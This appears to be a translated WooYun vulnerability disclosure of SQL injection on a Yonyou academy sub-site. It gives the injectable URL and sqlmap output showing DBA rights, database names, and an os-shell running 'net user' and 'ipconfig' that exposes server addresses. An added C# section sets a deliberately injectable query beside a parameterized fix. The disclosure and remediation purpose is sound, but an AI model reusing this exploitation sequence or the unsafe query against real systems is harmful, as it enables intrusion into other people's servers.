Vulnerability summary

Defect ID: wooyun-2014-087300

Title: SQL injection in a 用友 (Yonyou) sub-site, fourth installment

Vendor: 用友软件 (Yonyou Software)

Author:

Submitted: 2014-12-16 14:18

Fix deadline: 2014-12-21 14:20

Disclosed: 2014-12-21 14:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2014-12-16: details sent to the vendor, awaiting the vendor's handling
2014-12-21: the vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

Here is another one.

Details:

SQL injection URL:

http://academy.yonyou.com/ViewZsMap.aspx?der=zproducts&name=N


DBA privileges:

[22:33:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:33:38] [INFO] testing if current user is DBA
current user is DBA: True
[22:33:38] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap
tput\academy.yonyou.com'
[*] shutting down at 22:33:38


Database list:

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:34:10] [INFO] fetching database names
[22:34:11] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] JYSTimber_px
[*] master
[*] model
[*] msdb
[*] tempdb
[*] Timber_CP_EIS
[*] Timber_CP_ENT
[*] Timber_Exam_Gov
[*] Timber_Exam_Org_01
[*] Timber_Exam_Org_Wx
[*] Timber_Exam_Shangqi
[*] Timber_Exam_YL
[*] Timber_Live
[*] Timber_px
[*] Timber_PX_ENS
[*] Timber_PX_ENS2
[*] Timber_PX_ENS_AP
[*] Timber_PX_New_lexue_ceshi
[*] Timber_PX_New_YY
[*] Timber_PX_New_yy2
[*] Timber_PX_New_YY_Temp
[*] Timber_PX_YH
[*] Timber_PX_yonyou
[*] Timber_Tianming
[22:34:11] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\o
tput\academy.yonyou.com'
[*] shutting down at 22:34:11

Proof of vulnerability:

CMD commands can be executed, allowing privilege escalation:

os-shell> net user
do you want to retrieve the command standard output? [Y/n/a] y
[22:35:30] [INFO] the SQL query used returns 8 entries
[22:35:31] [INFO] retrieved: " "
[22:35:31] [WARNING] cannot properly display Unicode characters inside Windows
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances w
ll result in replacement with '?' character. Please, find proper character repr
sentation inside corresponding output files.
[22:35:31] [INFO] retrieved: "\\\\\\\\ ?????"
[22:35:31] [INFO] retrieved: " "
[22:35:31] [INFO] retrieved: "-----------------------------------------------..
[22:35:32] [INFO] retrieved: "Administrator \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?..
[22:35:32] [INFO] retrieved: "??????????????????"
[22:35:32] [INFO] retrieved: " "
[22:35:32] [INFO] retrieved: " "
command standard output:
---
\\ ?????
-------------------------------------------------------------------------------
Administrator \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0Guest \?a0\?a0\?a0\?a
\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0
Administrator Guest
??????????????????
---
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[22:35:49] [INFO] the SQL query used returns 38 entries
[22:35:49] [INFO] retrieved: " "
[22:35:50] [INFO] retrieved: "Windows IP ??"
[22:35:50] [INFO] retrieved: " "
[22:35:50] [INFO] retrieved: " "
[22:35:51] [INFO] retrieved: "?????? ????:"
[22:35:51] [INFO] retrieved: " "
[22:35:51] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:51] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0IPv4 ?? . . . . . . . . . . . . ..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0???? \\\\?a0. . . . . . . . . . ..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:53] [INFO] retrieved: " "
[22:35:53] [INFO] retrieved: "????? isatap.{8FFEDB7E-0A57-437F-A1CD-7F9A0F2EF..
[22:35:53] [INFO] retrieved: " "
[22:35:53] [INFO] retrieved: " \\\\?a0\\\\?a0???? \\\\?a0. . . . . . . . . . ..
[22:35:54] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:54] [INFO] retrieved: " "
[22:35:54] [INFO] retrieved: "????? 6TO4 Adapter:"
[22:35:55] [INFO] retrieved: " "
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0IPv6 ?? . . . . . . . . . . . . ..
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:56] [INFO] retrieved: " "
[22:35:56] [INFO] retrieved: "????? Teredo Tunneling Pseudo-Interface:"
[22:35:56] [INFO] retrieved: " "
[22:35:56] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0IPv6 ?? . . . . . . . . . . . . ..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:57] [INFO] retrieved: " "
[22:35:58] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: "Windows IP ??"
[22:35:59] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: "?????? ????:"
[22:36:00] [INFO] retrieved: " "
[22:36:00] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:36:00] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
command standard output:
---
Windows IP ??
?????? ????:
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
\?a0\?a0???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
\?a0\?a0IPv4 ?? . . . . . . . . . . . . : 222.191.251.170
IPv4 ?? . . . . . . . . . . . . : 222.191.251.170
\?a0\?a0???? \?a0. . . . . . . . . . . . : 255.255.255.192
???? . . . . . . . . . . . . : 255.255.255.192
\?a0\?a0????. . . . . . . . . . . . . : 222.191.251.129
????. . . . . . . . . . . . . : 222.191.251.129
????? isatap.{8FFEDB7E-0A57-437F-A1CD-7F9A0F2EF9E4}:
\?a0\?a0???? \?a0. . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
????? 6TO4 Adapter:
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
\?a0\?a0IPv6 ?? . . . . . . . . . . . . : 2002:debf:fbaa::debf:fbaa
IPv6 ?? . . . . . . . . . . . . : 2002:debf:fbaa::debf:fbaa
\?a0\?a0????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301
????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301
????? Teredo Tunneling Pseudo-Interface:
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
\?a0\?a0IPv6 ?? . . . . . . . . . . . . : 2001:0:9d38:6ab8:1429:162f:2140:455
IPv6 ?? . . . . . . . . . . . . : 2001:0:9d38:6ab8:1429:162f:2140:455
\?a0\?a0???? IPv6 ??. . . . . . . . : fe80::1429:162f:2140:455
???? IPv6 ??. . . . . . . . : fe80::1429:162f:2140:455
\?a0\?a0????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
Windows IP ??
?????? ????:
\?a0\?a0????? DNS ?? . . . . . . . :
????? DNS ?? . . . . . . . :
\?a0\?a0???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
---
os-shell>

Fix suggestion:

Fix the injection, reduce database privileges, filter input.
Thanks again for your hard work, friends in Beijing.

Copyright notice: when reposting, please credit the source @乌云 (WooYun)
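The three-part fix suggested above (fix the injection, reduce privileges, filter input) as an added C# example. This is not the source of ViewZsMap.aspx, which the report does not include; it reconstructs the concatenation pattern that the report's findings imply and places the hardened form beside it. The table name ZsMap, its columns Der and Name, the connection-string key AcademyDb, the GridView named MapGrid and the 50-character limit on name are all assumptions made for the example; the parameter names der and name and the value zproducts come from the URL in the report.

```csharp
// Added example: reconstructed vulnerable pattern and its hardened form.
// Not the site's own code. ZsMap, Der, Name, AcademyDb and MapGrid are assumed names.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class ViewZsMap : Page
{
    // Assumed: a GridView named MapGrid declared on the .aspx page.
    protected GridView MapGrid;

    // Assumed: a connection string named "AcademyDb" in Web.config. The login it
    // names should be a database-scoped user with SELECT rights on ZsMap only,
    // not a member of sysadmin (the report shows "current user is DBA: True").
    private static string GetConnectionString()
    {
        return ConfigurationManager.ConnectionStrings["AcademyDb"].ConnectionString;
    }

    // VULNERABLE pattern: query-string values are concatenated into the SQL text,
    // so a crafted 'name' value changes the statement the server executes.
    private static DataTable LoadMapUnsafe(string der, string name)
    {
        string sql = "SELECT * FROM ZsMap WHERE Der = '" + der + "' AND Name = '" + name + "'";
        using (SqlConnection conn = new SqlConnection(GetConnectionString()))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            DataTable table = new DataTable();
            new SqlDataAdapter(cmd).Fill(table); // Fill opens and closes the connection
            return table;
        }
    }

    // Input filter: 'der' selects a fixed category, so only known values are accepted.
    private static readonly string[] AllowedDer = { "zproducts" };

    // HARDENED: the same query with typed parameters. The values are sent separately
    // from the SQL text and are never parsed as SQL, whatever characters they contain.
    private static DataTable LoadMapSafe(string der, string name)
    {
        if (der == null || Array.IndexOf(AllowedDer, der) < 0)
            throw new ArgumentException("unexpected value for der");
        if (string.IsNullOrEmpty(name) || name.Length > 50) // length limit is assumed
            throw new ArgumentException("unexpected value for name");

        const string sql = "SELECT * FROM ZsMap WHERE Der = @der AND Name = @name";
        using (SqlConnection conn = new SqlConnection(GetConnectionString()))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@der", SqlDbType.NVarChar, 50).Value = der;
            cmd.Parameters.Add("@name", SqlDbType.NVarChar, 50).Value = name;
            DataTable table = new DataTable();
            new SqlDataAdapter(cmd).Fill(table);
            return table;
        }
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        // Request.QueryString values are attacker controlled; only the safe path is used.
        try
        {
            MapGrid.DataSource = LoadMapSafe(Request.QueryString["der"], Request.QueryString["name"]);
            MapGrid.DataBind();
        }
        catch (ArgumentException)
        {
            Response.StatusCode = 400; // reject unexpected input without leaking details
        }
    }
}
```

Two further steps belong to the "reduce privileges" part of the suggestion and are taken on the database server rather than in this file: the login named in the connection string should hold only the rights the page needs instead of sysadmin membership, and command execution through SQL Server should be disabled with `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;`. The os-shell output above is only possible because the web application's login can run operating-system commands from the database; with a low-privilege login and xp_cmdshell disabled, a remaining injection flaw would expose data but not the host.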


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2014-12-21 14:20

Vendor reply:

Latest status:

None yet